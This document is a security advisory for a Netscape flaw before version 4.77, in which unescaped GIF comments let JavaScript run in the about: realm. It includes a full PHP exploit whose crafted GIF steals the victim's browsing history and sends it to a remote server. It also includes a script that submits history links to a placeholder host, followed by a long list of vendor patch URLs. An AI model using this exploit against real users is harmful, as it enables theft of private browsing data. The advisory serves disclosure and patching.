COMMAND
Netscape
SYSTEMS AFFECTED
Netscape prior to 4.77
PROBLEM
Florian Wesch found following. The Netscape browser does not
escape the gif file comment in the image information page. This
allows javascript execution in the "about:" protocol and can for
example be used to upload the History (about:global) to a
webserver.
Netscape does not allow javascript to access documents from a
different domain. This stops a javascript from one domain that
tries to mess around with login forms/private data from other
domain. The following error message is shown
"access disallowed from scripts at <javascriptdomain> to documents at another domain."
Now there is the protocol "about:" that is used for some special
tasks.
about: - shows Netscape version and copyrights
about:blank - shows a blank document
about:config - shows Browser configuration.
about:global - shows Information about the Netscape global history
about:<url> - shows Information about the specified url
..
There are some other about: documents (try grepping the netscape
binary).
about:global is very interesting since all visited documents are
listed there. So Florian tried to find a way to access this
information.
Florian created a frameset with 2 frames. The first Frame (called
foo) contains about:global. Using <frame src="about:global">,
<meta http-equiv="refresh" content="10; URL=about:global"> or
document.location.href="about.global"; for setting this url did
not work. So Florian used the following trick to make it work:
<base href="about:">
<form action="global" name="loadhistory">
<input type="submit">
</form>
<script language="javascript">
document.loadhistory.submit();
</script>
Intention is that the second frame (called bar) grabs 10 urls
in the first frame using javascript and sends them to the server.
Accessing parent.frames["foo"].document.links does not work since
foo is displaying an about: document and bar is a normal http
document: "access disallowed from scripts at blah to documents.."
So he tried to find a way to start a javascript within an
about: document. about:<someurl> comes into mind since there are
a lot server specified values.
First he tried to inject javascript using the url of the script.
But since this url is encoded (space => %20 etc.) there is no way
in. Modifying the Content-Type (File MIME Type) did not work
either because Netscape opens a "Save as..." window when supplying
an unknown mimetype.
Netscape shows the comment included in gif files. A quick test
showed that the comment is not escaped. So Javascript in gif
comments is executed in the about: realm. This means that this
script can then access the content of about:global. Nice.
The following script included in the comment reads 10 urls in
the about:global frame (foo), stores them in the form and finally
submits this form.
<form action=http://bla/ns476history.php target=_parent name=s method=get>
<input name=u>
</form>
<script>
f=parent.frames["foo"].document;
l="";
for(i=0;i<10;i++)
l+=f.links[i]+"|";
document.s.u.value=l;
document.s.submit();
</script>
The server has 10 urls of about:global urls now. Accessing
about:config should be possible too, but we did not try it.
Exploit:
<?
/*
Netscape 4.76 gif comment flaw
Florian Wesch <fw@dividuum.de>
http://dividuum.de
*/
$self="http://".$SERVER_NAME.(($SERVER_PORT==80)?"":":$SERVER_PORT").$PHP_SELF;
if (strlen($self)>64) {
echo "Url of $self is too long. 64 maximum.<br>";
echo "You can change this but I think 64 should be enough for anybody ;-)";
exit;
}
if (!isset($mode)) $mode="intro";
// If urllist is submitted
if (isset($u)) $mode="showhist";
switch ($mode) {
case "intro":
?>
<html>
<body>
<a href="<? echo $self; ?>?mode=frameset">Submit 10 urls of your history</a><br>
</body>
</html>
<?
break;
case "frameset":
?>
<html>
<frameset rows="50%,50%" border=0 frameborder=0 framespacing=0>
<frame src="<? echo $self; ?>?mode=loadhistory" name="foo" scrolling=no>
<frame src="<? echo $self; ?>?mode=showimageinfo" name="bar" scrolling=no>
</frameset>
</html>
<?
break;
case "loadhistory":
// replaces the current document with about:global using javascript
?>
<html>
<base href="about:">
<form action="global" name="loadhistory">
<input type="submit">
</form>
<script language="javascript">
document.loadhistory.submit();
</script>
</html>
<?
break;
case "showimageinfo":
?>
<html>
<head>
<meta http-equiv="refresh" content="5; URL=about:<? echo $self; ?>?mode=evilgif">
</head>
<body>
Waiting 5 seconds...<br>
<img src="<? echo $self; ?>?mode=evilgif">
</body>
</html>
<?
break;
case "evilgif":
// Gifs are supposed to be compressed. The program I
// used sucks :-)
header("Content-type: image/gif");
$gif ="4749463839610a000a00f70000ffffffffffccffff";
$gif.="99ffff66ffff33ffff00ffccffffccccffcc99ffcc6";
$gif.="6ffcc33ffcc00ff99ffff99ccff9999ff9966ff9933";
$gif.="ff9900ff66ffff66ccff6699ff6666ff6633ff6600f";
$gif.="f33ffff33ccff3399ff3366ff3333ff3300ff00ffff";
$gif.="00ccff0099ff0066ff0033ff0000fffffffffffffff";
$gif.="fffffffffffffffffffffffffffffffffffffffffff";
$gif.="fffffffffffffffffffffffffffffffffffffffffff";
$gif.="fffffffffffffffffffffffffffffffffffffffffff";
$gif.="ffffffffffffffffffffffff0000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="00000000000000021feff";
$gif.=bin2hex(sprintf("%77s%s",
/*"<form action=".$self,' target=_parent name=s method=get >'.*/
/* I'm using POST so the submitted urls do not appear in the logfile */
"<form action=".$self,' target=_parent name=s method=post>'.
'<input name=u>'.
'</form>'.
'<script>'.
'f=parent.frames["foo"].document;'.
'l="";'.
/*'for(i=0;i<f.links.length;i++)'.*/
'for(i=0;i<10 ;i++)'.
'l+=f.links[i]+"|";'.
'document.s.u.value=l;'.
'document.'.chr(255).'s.submit();'.
'</script>'));
$gif.= "00000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="0000000000000000000000000000000000000000000";
$gif.="00000000000002c000000000a000a00000813004708";
$gif.="1c48b0a0c18308132a5cc8b061c28000003b";
echo pack("H".strlen($gif), $gif);
break;
case "showhist":
$urls=explode("|",$u);
echo "<h1>Top 10 urls in about:global</h1>";
foreach ($urls as $url) {
echo "<a href=$url>$url</a><br>";
}
};
?>
SOLUTION
Disable Javascript or upgrade to 4.77.
For RedHat:
ftp://updates.redhat.com/6.2/en/os/SRPMS/netscape-4.77-0.6.2.src.rpm
ftp://updates.redhat.com/6.2/en/os/SRPMS/netscape-alpha-4.77-0.6.2.src.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/netscape-common-4.77-0.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/netscape-communicator-4.77-0.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/netscape-navigator-4.77-0.6.2.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/i386/netscape-common-4.77-0.6.2.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/netscape-communicator-4.77-0.6.2.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/netscape-navigator-4.77-0.6.2.i386.rpm
ftp://updates.redhat.com/7.0/en/os/SRPMS/netscape-4.77-1.src.rpm
ftp://updates.redhat.com/7.0/en/os/SRPMS/netscape-alpha-4.77-1.src.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/netscape-common-4.77-1.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/netscape-communicator-4.77-1.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/netscape-navigator-4.77-1.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/i386/netscape-common-4.77-1.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/netscape-communicator-4.77-1.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/netscape-navigator-4.77-1.i386.rpm
For Immunix OS:
http://immunix.org/ImmunixOS/6.2/updates/RPMS/netscape-common-4.77-0.6.2_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/6.2/updates/RPMS/netscape-communicator-4.77-0.6.2_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/6.2/updates/RPMS/netscape-navigator-4.77-0.6.2_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/6.2/updates/SRPMS/netscape-4.77-0.6.2_StackGuard.src.rpm
http://immunix.org/ImmunixOS/7.0/updates/RPMS/netscape-common-4.77-1_imnx.i386.rpm
http://immunix.org/ImmunixOS/7.0/updates/RPMS/netscape-communicator-4.77-1_imnx.i386.rpm
http://immunix.org/ImmunixOS/7.0/updates/RPMS/netscape-navigator-4.77-1_imnx.i386.rpm
http://immunix.org/ImmunixOS/7.0/updates/SRPMS/netscape-4.77-1_imnx.src.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/netscape-navigator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/netscape-4.77-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/netscape-common-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/netscape-communicator-4.77-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/netscape-navigator-4.77-1cl.i386.rpm
For Progeny Linux:
1. Ensure that your /etc/apt/sources.list file has a URI for
Progeny's update repository:
deb http://archive.progeny.com/progeny updates/newton/
2. Update your cache of available packages for apt(8).
# apt-get update
3. If you are currently running the Netscape browser, please
exit the application.
4. Using apt(8), install the new package. apt(8) will
download the update, verify its integrity with md5, and
then install the package on your system with dpkg(8).
# apt-get install netscape
For Debian Linux:
http://security.debian.org/dists/stable/updates/contrib/source/netscape4.base_4.77-1.tar.gz
http://security.debian.org/dists/stable/updates/contrib/source/netscape4.base_4.77-1.dsc
http://security.debian.org/dists/stable/updates/main/source/netscape4.77_4.77-2.dsc
http://security.debian.org/dists/stable/updates/main/source/netscape4.77_4.77-2.diff.gz
http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-ja-resource-477_4.77-2_all.deb
http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-java-477_4.77-2_all.deb
http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-ko-resource-477_4.77-2_all.deb
http://security.debian.org/dists/stable/updates/non-free/binary-all/netscape-zh-resource-477_4.77-2_all.deb
http://security.debian.org/dists/stable/updates/non-free/binary-all/navigator-nethelp-477_4.77-2_all.deb
http://security.debian.org/dists/stable/updates/non-free/binary-all/communicator-nethelp-477_4.77-2_all.deb
http://security.debian.org/dists/stable/updates/non-free/binary-all/communicator-spellchk-477_4.77-2_all.deb
http://security.debian.org/dists/stable/updates/contrib/binary-i386/netscape_4.77-1_i386.deb
http://security.debian.org/dists/stable/updates/contrib/binary-i386/netscape-base-4-libc5_4.77-1_i386.deb
http://security.debian.org/dists/stable/updates/contrib/binary-i386/netscape-base-4_4.77-1_i386.deb
http://security.debian.org/dists/stable/updates/contrib/binary-i386/navigator_4.77-1_i386.deb
http://security.debian.org/dists/stable/updates/contrib/binary-i386/communicator_4.77-1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/netscape-base-477_4.77-2_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/netscape-smotif-477_4.77-2_i386.deb
http://security.debian.org/dists/stable/updates/non-free/binary-i386/netscape-base-477_4.77-2_i386.deb
http://security.debian.org/dists/stable/updates/non-free/binary-i386/navigator-base-477_4.77-2_i386.deb
http://security.debian.org/dists/stable/updates/non-free/binary-i386/navigator-smotif-477_4.77-2_i386.deb
http://security.debian.org/dists/stable/updates/non-free/binary-i386/communicator-base-477_4.77-2_i386.deb
http://security.debian.org/dists/stable/updates/non-free/binary-i386/communicator-smotif-477_4.77-2_i386.deb
For Turbo Linux:
ftp://ftp.turbolinux.com/pub/updates/6.0/security/netscape-communicator-4.77-3.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/netscape-communicator-4.77-3.src.rpm